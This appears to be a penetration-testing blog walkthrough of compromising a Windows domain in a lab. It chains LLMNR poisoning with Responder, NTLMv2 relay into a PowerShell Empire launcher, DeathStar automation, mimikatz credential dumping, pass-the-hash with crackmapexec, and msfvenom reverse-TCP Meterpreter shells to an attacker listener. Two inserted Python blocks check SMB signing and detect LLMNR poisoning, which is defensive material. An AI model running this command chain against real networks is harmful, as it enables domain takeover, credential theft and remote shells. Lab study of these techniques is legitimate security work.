What I’m using:
Host: Ubuntu 16.04, Kali Linux (Latest)
Target 1: Windows Server 2008 R2 (Dummy server)
Target 2: Windows Server 2008 R2 (Domain Controller)
In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way during a penetration test. The problem is that NTLMv2 hashes cannot be passed (regular NTLM hashes can), so if your dictionary isn’t good, or the domain enforces a strict password policy with numbers and special characters, you’ll be sitting with an NTLMv2 hash and a username and nothing to do with them. There is, however, the option of relaying that username and hash. The nasty thing is that NTLM relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. Worse, there are a few tools that can automate the entire damn thing.
Now, before I get started, there are a few things I’d like to clarify.
- I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali: the Python requests library there refuses to negotiate any TLS version below 1.2.
- The first part of this process assumes that NTLM relaying is possible; if SMB signing is enabled, this entire operation is dead in the water. By default it’s disabled, which is good or bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent onto a machine by any means, Deathstar will do its stuff. It doesn’t NEED NTLM relaying; this is just an interesting way of getting an Empire agent.
- I’m doing this on my lab network, not someone else’s. This demo simulates what can happen if LLMNR spoofing is possible and a domain admin’s credentials are captured. It is a very limited demo of what Deathstar and Crackmapexec can do, and I encourage you to read about their capabilities here.
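Since the whole operation hinges on whether the target requires SMB signing, the check a defender (or an auditor) wants is to read the server's advertised signing policy from its SMB2 NEGOTIATE response. The following is an added example written for this post, not code from the post or from ntlmrelayx/Crackmapexec; the byte layout follows MS-SMB2, and the sample packets it builds are constructed (the ServerGuid, sizes and the host names in the test are made up). It also makes a point the text glosses over: relay is only stopped when signing is *required*, not merely enabled.

```python
"""Read the signing policy from a raw SMB2 NEGOTIATE response (audit helper).

Added illustration, not part of the original post or of any tool it uses.
Layout per MS-SMB2: a 64-byte header starting with b"\xfeSMB", then a
NEGOTIATE response body whose SecurityMode field sits right after the
2-byte StructureSize (offset 66 from the start of the packet).
"""
import struct

SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE_RESP_SIZE = 65            # StructureSize value, MS-SMB2 2.2.4
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


def signing_policy(packet: bytes) -> dict:
    """Return the server's signing flags parsed from an SMB2 NEGOTIATE response.

    Raises ValueError if the bytes are not an SMB2 NEGOTIATE response.
    Only SIGNING_REQUIRED blocks relay: a server that merely "enables"
    signing still accepts an unsigned session from a relayed client.
    """
    if len(packet) < SMB2_HEADER_LEN + 6:
        raise ValueError("packet too short for an SMB2 NEGOTIATE response")
    if packet[:4] != b"\xfeSMB":          # b"\xffSMB" would be SMB1
        raise ValueError("not an SMB2 packet")
    command = struct.unpack_from("<H", packet, 12)[0]
    if command != 0x0000:                 # 0x0000 == SMB2 NEGOTIATE
        raise ValueError("SMB2 command is not NEGOTIATE")
    structure_size, security_mode, dialect = struct.unpack_from(
        "<HHH", packet, SMB2_HEADER_LEN)
    if structure_size != SMB2_NEGOTIATE_RESP_SIZE:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    required = bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)
    return {
        "dialect": hex(dialect),
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": required,
        "relay_blocked": required,
    }


def hosts_exposed_to_relay(responses: dict) -> list:
    """Given {hostname: raw NEGOTIATE response}, list hosts not requiring signing."""
    return sorted(host for host, pkt in responses.items()
                  if not signing_policy(pkt)["relay_blocked"])


def build_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Build a minimal, constructed SMB2 NEGOTIATE response for testing.

    Only the fields signing_policy() reads carry meaning; the rest are
    filler. Dialect 0x0210 is SMB 2.1, what Server 2008 R2 speaks.
    """
    header = b"\xfeSMB" + struct.pack(
        "<HHIHHIIQIIQ16s",
        64,            # StructureSize
        0,             # CreditCharge
        0,             # Status: STATUS_SUCCESS
        0x0000,        # Command: NEGOTIATE
        1,             # CreditResponse
        0x00000001,    # Flags: SMB2_FLAGS_SERVER_TO_REDIR
        0,             # NextCommand
        0,             # MessageId
        0,             # Reserved
        0,             # TreeId
        0,             # SessionId
        b"\x00" * 16,  # Signature (unsigned negotiate)
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        SMB2_NEGOTIATE_RESP_SIZE, security_mode, dialect,
        0,                         # NegotiateContextCount
        b"\x11" * 16,              # ServerGuid (constructed)
        0, 65536, 65536, 65536,    # Capabilities, MaxTransact/Read/WriteSize
        0, 0,                      # SystemTime, ServerStartTime
        128, 0, 0,                 # SecurityBufferOffset/Length, NegotiateContextOffset
    ) + b"\x00"                    # 1-byte Buffer, giving StructureSize 65
    return header + body


if __name__ == "__main__":
    # Constructed fleet: a DC that requires signing, a member server that does not.
    fleet = {"dc01": build_negotiate_response(0x0003),
             "fileserver": build_negotiate_response(0x0001)}
    print("hosts where NTLM relay is not blocked:", hosts_exposed_to_relay(fleet))
```

To use it against a real response, capture the NEGOTIATE reply bytes (after the 4-byte NetBIOS session header) and pass them to `signing_policy()`; the `build_negotiate_response()` helper exists only so the module runs offline.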
Without further ado:
I first start up the RESTful API for Empire in one terminal.
sudo python empire --rest --username empireadmin --password Password123
Then I start up Deathstar in another.
sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100
The listener IP will be whatever IP Empire is listening on. -t 100 means I’m giving it 100 threads to run, so it’s faster.
Next, I generate the PowerShell script from Empire. To do this, go to the listener module in Empire by typing in
From here, I create the payload by using the command
launcher powershell Deathstar
Copy the PowerShell script, as you’ll paste it in a minute.
Next, I set up ntlmrelayx.py (Guide to set up NTLMRelayx.py here)
sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc [powershell code]'
ntlmrelayx.py also supports a target file with the -tf switch, so you can supply multiple targets if you want. Note that the PowerShell command must be in quotes or it won’t run.
Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP, so Responder doesn’t compete with ntlmrelayx.py for those ports.
Finally, start up Responder
sudo python Responder.py -I ens33 -r -d -v
My screen then looks like this once it’s all set up.
Next, using my Windows machine, I simulate the domain admin mistyping a share name, which generates an LLMNR request.
The poisoned answer is then sent by Responder.
The NTLMv2 credentials are relayed.
An Empire agent is opened.
Deathstar automatically starts doing its thing.
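The mistyped share name above is an LLMNR query that no legitimate host answers, which is exactly what makes poisoning detectable: a defender can periodically resolve a name that does not exist anywhere on the network (a canary) and treat any answer as a poisoner announcing itself. The following is an added example, not code from the post or from Responder; it parses raw LLMNR messages (RFC 4795, which reuses the DNS wire format on UDP 5355) and flags answers for the canary. The canary name `FILESRV-TYPO`, the packet IDs and the answering address are constructed for the demo.

```python
"""Detect LLMNR poisoning by watching for answers to a canary hostname.

Added illustration for this post; not part of the original or of Responder.
An LLMNR message is a DNS-shaped message: 12-byte header, questions, then
answers. A real network never answers a canary name, so a response that
answers it reveals the address of whatever is poisoning the segment.
All packets built here are constructed test samples.
"""
import socket
import struct

LLMNR_TYPE_A = 1
LLMNR_CLASS_IN = 1
FLAG_QR = 0x8000            # response bit in the flags word


def encode_name(name: str) -> bytes:
    """Encode a host name as length-prefixed labels, terminated by a zero byte."""
    labels = [label.encode("ascii") for label in name.split(".")]
    return b"".join(bytes([len(label)]) + label for label in labels) + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode a label sequence at off, following compression pointers.

    Returns (name, offset just past the name in the original position).
    """
    labels, jumped, end = [], False, off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # 2-byte pointer
            if not jumped:
                end = off + 2
            off = struct.unpack_from(">H", msg, off)[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    if not jumped:
        end = off
    return ".".join(labels), end


def parse_llmnr(msg: bytes) -> dict:
    """Parse header, questions and answers of an LLMNR message."""
    ident, flags, qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", msg, 0)
    off = 12
    questions = []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack_from(">HH", msg, off)
        off += 4
        questions.append((name, qtype, qclass))
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == LLMNR_TYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)            # present A records as text
        answers.append((name, rtype, ttl, rdata))
    return {"id": ident, "is_response": bool(flags & FLAG_QR),
            "questions": questions, "answers": answers}


def poisoned_answers(msg: bytes, canary: str) -> list:
    """Answers claiming the canary name; a non-empty list means a poisoner is active."""
    parsed = parse_llmnr(msg)
    if not parsed["is_response"]:
        return []
    return [a for a in parsed["answers"] if a[0].lower() == canary.lower()]


def build_query(ident: int, name: str) -> bytes:
    """Constructed LLMNR A query, as a client would send for a mistyped share host."""
    return (struct.pack(">HHHHHH", ident, 0, 1, 0, 0, 0)
            + encode_name(name) + struct.pack(">HH", LLMNR_TYPE_A, LLMNR_CLASS_IN))


def sample_poisoned_response(ident: int, name: str, ip: str, ttl: int = 30) -> bytes:
    """Constructed response a poisoner would send: answer name is a pointer to the question."""
    question = encode_name(name) + struct.pack(">HH", LLMNR_TYPE_A, LLMNR_CLASS_IN)
    answer = (struct.pack(">H", 0xC00C)                # pointer to name at offset 12
              + struct.pack(">HHIH", LLMNR_TYPE_A, LLMNR_CLASS_IN, ttl, 4)
              + socket.inet_aton(ip))
    return struct.pack(">HHHHHH", ident, FLAG_QR, 1, 1, 0, 0) + question + answer


if __name__ == "__main__":
    canary = "FILESRV-TYPO"                            # constructed canary name
    reply = sample_poisoned_response(0x1234, canary, "192.168.232.133")
    print("poisoner detected:", poisoned_answers(reply, canary))
```

In practice the monitor sends `build_query()` to the LLMNR multicast group (224.0.0.252, port 5355) from a sensor host and passes whatever arrives on that socket to `poisoned_answers()`; the address in the returned answer is the host to go and find.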
For this demo, Deathstar took about 5 minutes to find the domain controller and its active users, then spawn another Empire agent on the domain controller.
An Empire agent is now running on the DC
The final step is to get a shell.
There are many ways to do this:
- Upload a meterpreter payload in the form of a .exe and execute it via the shell command
- Use mimikatz to get the credentials on the server, then use crackmapexec to pass the hash and open a meterpreter session
- Use Empire’s Invoke-Shellcode module
- Many more; research it.
Using Mimikatz & Crackmapexec to open Meterpreter Shell
First is to interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is domain admin, SYSTEM is still a higher privilege.
interact [agent name]
Then run mimikatz
After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing
and a nice table is shown.
As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.
First, set up multi/handler.
Then run crackmapexec. Even though I have the password in plain text, I’m using the hash here to show that pass-the-hash (PTH) is possible.
crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443
Uploading a Meterpreter Payload via Empire
First, create a Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe
Copy the .exe into the Empire directory
Interact with the agent in Empire
interact [Agent name]
Upload and execute the .exe
Grats on shell
There are many, many more ways to escalate from an agent to a shell, but these are two of the easiest. Uploading an executable is not the stealthiest and is probably the least recommended, but a shell is a shell.
Extra Resources and credit for Deathstar & Crackmapexec: